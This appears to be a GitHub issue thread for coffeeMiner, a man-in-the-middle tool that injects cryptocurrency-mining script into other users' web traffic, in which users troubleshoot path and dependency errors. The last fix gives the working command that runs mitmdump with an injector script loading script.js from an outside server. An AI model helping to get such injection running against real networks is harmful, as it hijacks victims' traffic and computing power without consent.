### ISSUE TITLE
Error!!!!

### ISSUE THREAD

**Issue by JesusPorras7** [arnaucode/coffeeMiner#9]
When I run python3 coffeeminer.py it gives me an error "sh: 1: /root/.local/bin/mitmdump: not found"

**Comment by iomonad** [comment]
https://mitmproxy.org/

**Comment by Yossarian161** [comment]
I have met the same problem. Then I found the "mitmdump" file was in "usr/bin". Then I changed the coffeeminer.py. But more problems emerged and I still can't solve this problem.

**Comment by Yossarian161** [comment]
Problems solved. First, chaged the "/root/.local/bin/mitmdump" to "usr/bin" or the mitmdump file location. Then it will show that "can not from contruct import UBInt16", just reinstall construct "pip3 install construct==2.5.3". Then it will show "can not  import __version__". Find all the files and delete the part related with "__version__". It has no big use.Just run coffeeminer.py and no more problems. Maybe there will be more elegent solutions...

**Comment by JesusPorras7** [comment]
Sorry friend but I do not understand what you want to say. What do I have to reinstall? and what files to delete?

**Comment by Ormicron** [comment]
"CoffeeMiner.py" The 28 line is changed to this os.system("/usr/bin/mitmdump -s 'injector.py http://httpservice:8000/script.js' -T")

**Comment by JesusPorras7** [comment]
thanks, it works perfectly.
